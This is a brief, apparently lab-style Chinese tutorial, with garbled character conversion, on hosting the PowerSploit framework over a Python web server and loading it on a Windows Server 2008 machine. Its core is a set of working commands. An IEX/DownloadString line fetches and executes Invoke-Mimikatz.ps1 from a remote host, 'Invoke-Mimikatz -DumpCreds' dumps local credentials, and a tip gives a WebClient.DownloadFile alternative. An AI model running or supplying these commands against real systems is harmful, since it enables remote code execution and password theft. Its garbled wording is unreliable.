powershell腳本站點的搭建
一、Powersploit
Powersploit是一款基于powershell的後滲透(Post-Exploitation)架構,內建大量滲透相關子產品和功能。
下載下傳powersploit
github位址: https://github.com/mattifestation/PowerSploit
二、搭建站點(這裡用python自帶的web服務,也可以用phpstudy等搭建站點)
1.實驗環境:
服務端:win7(python3.7)
用戶端:Windows server 2008
用戶端有python環境(用python的web服務),確定用戶端能連通服務端
2.實驗步驟:
服務端:(win7)
1.把下載下傳好的powersploit,解壓

2.安裝python,cd到PowerSploit-master目錄裡面,并開啟web服務
python -m http.server 80 #python3.7
3.本地測試python的web服務是否開啟
用戶端:(windows server2008)
用戶端測試:
可以看到通過用戶端的浏覽器通路到搭建的站點了
下面開始進行powersploit内網滲透神器其中的Invoke-Mimikatz.ps1腳本檔案進行舉例
在用戶端加載服務端腳本并執行(IEX遠端下載下傳腳本執行)
powershell加載iex(New-Object Net.WebClient).DownloadString('http://192.168.10.4/Exfiltration/Invoke-Mimikatz.ps1”)
執行: Invoke-Mimikatz -DumpCreds
效果圖如下:
從上圖可以看到已經擷取到本機(windows server2008 的使用者名和密碼)
Tips:還有一種可以直接把腳本檔案下載下傳下來的方式
$client=new-object System.Net.WebClient
$client.DownloadFile(‘http://192.168.8.135/Exfiltration/Invoke-Mimikatz.ps1’,’C://Mimikatz.ps1’)
也可以直接運作腳本檔案來進行内網攻擊,但這種方式并不推薦,因為系統出于安全考慮
powershell預設是不能執行本機上的.ps1檔案的,這是因為ps有預設的安全限制